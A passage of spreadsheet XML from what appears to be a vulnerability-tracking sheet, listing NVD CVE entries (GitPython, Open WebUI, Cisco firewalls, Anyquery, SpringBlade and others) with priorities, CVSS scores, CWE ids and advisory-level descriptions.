          <t>GitPython before 3.1.60 fails to properly validate the git directory location, allowing attackers to impersonate the git directory using tracked files like gitdir, commondir, and HEAD. Attackers can execute arbitrary code by placing a malicious pre-commit hook in the tracked hooks directory that executes when a victim calls index.commit() on a cloned or opened repository.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87995</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.11 until 0.11.1, src/lib/components/chat/FileNav/PortPreview.svelte rendered terminal port content in an iframe sandbox containing both allow-scripts and allow-same-origin. Because the terminal proxy serves that content from the Open WebUI origin, an authenticated user with access to a shared terminal server could host script on a previewed port and take over a victim's account when the victim opened the preview. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87995</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88263</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>XikeStor Layer3 switches miss authentication for downloading configuration data. Unauthenticated attacker may retrieve the configuration data containing network configurations and passwords to operate the affected product improperly or to exploit the affected product as a jump host.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88263</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88817</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>cert@airbus.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-284</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>An authenticated, non-guest user of Curiosity Workspace could enroll themselves as an administrator and member of an existing access group without an invitation or approval.
It did not grant application-wide administrator privileges, and the vulnerability could not be used to obtain root access to the application or its underlying host.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88817</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>Nodemailer versions 9.1.0 through 10.0.4 contain a quadratic time complexity vulnerability in the addressparser component when parsing email addresses with RFC 5322 comments. Attackers can craft malicious email headers with comment-separated atoms to consume excessive CPU and block the Node.js event loop for several seconds, causing denial of service.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92355</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>security@octopus.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Octopus Server, a user with permission to modify non built-in external feeds could exploit a path traversal flaw to overwrite arbitrary files on the server, which in some configurations could lead to remote code execution.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92355</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19535</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-352: Cross-Site Request Forgery (CSRF) vulnerability in the LuCI administrative web interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote unauthenticated attacker to perform unauthorized state-changing requests on behalf of a logged-in administrator, enabling unauthorized access to privileged management functions.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19535</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20135</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the TLS 1.3 implementation in Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper buffer management during the TLS 1.3 connection. An attacker could exploit this vulnerability by sending a crafted TLS 1.3 packet to an affected system through a TLS 1.3-enabled listening socket. A successful exploit could allow the attacker to cause the LINA process to crash, which would cause the device to reload. The reload can happen before or after authentication of the connection.Note:&amp;nbsp;TLS 1.3 connections include both data traffic and user-management traffic.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20135</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20154</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the system rate-limiting process for syslog message 419002 of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause high CPU utilization on an affected device, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper rate limiting for syslog message 419002. An attacker could exploit this vulnerability by sending a flood of TCP synchronization (SYN) packets to an affected device. A successful exploit could allow the attacker to cause high CPU utilization, resulting in performance degradation.&amp;nbsp;</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20154</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20249</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the certification authentication feature of Internet Key Exchange version 2 (IKEv2)&amp;nbsp;for Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly.
This vulnerability is due to a logic error during the certificate authentication phase of the IKEv2 connection setup. An attacker could exploit this vulnerability by attempting to establish an IKEv2 VPN connection with a crafted certificate. A successful exploit could allow the attacker to cause the IKEv2 process to crash, causing a denial of service (DoS) condition.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20249</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20250</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Datagram TLS (DTLS) message handling of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software for Cisco Secure Firewall 3100 Series and 4200 Series devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to improper resource management when processing certain DTLS messages. An attacker could exploit this vulnerability by sending a crafted stream of DTLS traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20250</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20295</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software and Cisco Secure FTD Software could allow an unauthenticated, remote attacker to exhaust the available memory of an affected device.
This vulnerability is due to improper management of memory resources during sftunnel TLS connection setup. An attacker could exploit this vulnerability by sending crafted sftunnel TLS frames to an affected device&amp;nbsp;during the connection setup. A successful exploit could allow the attacker to exhaust the available memory on the affected device, which could result in a DoS condition.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20295</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20352</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the RADIUS feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to improper handling of certain RADIUS requests. An attacker could exploit this vulnerability by sending a crafted RADIUS request directly to an affected device. A successful exploit could allow the attacker to cause the ISE node to become unavailable. For single node deployments in that condition, endpoints that have not already authenticated would be unable to access the network until the&amp;nbsp;node comes back up on its own.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20352</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4129</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>There is an improper access control vulnerability in NI SystemLink that may allow an authenticated user with limited privileges to access host operating system files and directories that should be restricted. This vulnerability affects NI SystemLink and NI SystemLink Server versions prior to 2026 Q3.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4129</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54628</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-441, CWE-862, CWE-918</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>Anyquery is an SQL query engine built on top of SQLite. Prior to 0.4.5, anyquery server exposes URL-capable SQLite virtual table modules such as json_reader and log_reader through its unauthenticated MySQL-compatible server port without restricting outbound destinations. A remote attacker can provide a loopback, private-network, or link-local cloud metadata URL, causing go-getter in the Anyquery server process to fetch the selected resource and expose its response as queryable table data. This permits internal network probing, access to internal APIs, and disclosure of cloud credentials; low-integrity impact is possible when a reached internal API performs state-changing actions. This issue is fixed in version 0.4.5.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54628</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56100</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>SpringBlade versions from 2.7.3 up to but not including 5.0.0 contain a privilege escalation vulnerability that allows authenticated attackers to create system administrator accounts by sending crafted POST requests to an unprotected internal Feign user-creation endpoint exposed via @RestController without authorization checks. Attackers can exploit the gateway's authentication filter, which only validates JWT parsing without verifying user roles or caller identity, and leverage a hardcoded JWT signing key embedded in publicly available JARs to forge tokens and escalate privileges from a low-privilege user to administrator, enabling cross-tenant data pollution and persistent backdoor access.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56100</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73163</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
